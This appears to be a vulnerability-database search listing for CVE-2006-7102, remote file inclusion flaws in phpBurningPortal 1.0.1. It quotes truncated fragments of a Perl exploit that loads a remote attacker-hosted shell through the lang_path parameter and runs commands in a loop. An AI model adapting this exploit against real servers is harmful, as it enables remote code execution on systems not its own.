6 matches found
EUVD-2006-7084
Malware in sbrugna...
phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = questdelete.php?langpath=; elsif $fileno eq 2 $file =...
CVE-2006-7102
Multiple PHP remote file inclusion vulnerabilities in phpBurningPortal quiz-modul 1.0.1, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the langpath parameter to 1 questdelete.php, 2 questedit.php, or 3 questnews.php...
CVE-2006-7102
CVE-2006-7102 describes multiple PHP remote file inclusion vulnerabilities in the phpBurningPortal quiz-modul 1.0.1 (and possibly earlier) that allow remote attackers to execute arbitrary PHP code via a URL supplied to the lang_path parameter in one of three scripts: quest_delete.php, quest_edit....
phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit
Exploit for unknown platform in category web applications ================================================================= phpBurningPortal ; while $cmd ! "exit" $xpl = LWP::UserAgent-new or die; $req = HTTP::Request-newGET=$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd or...
phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file =...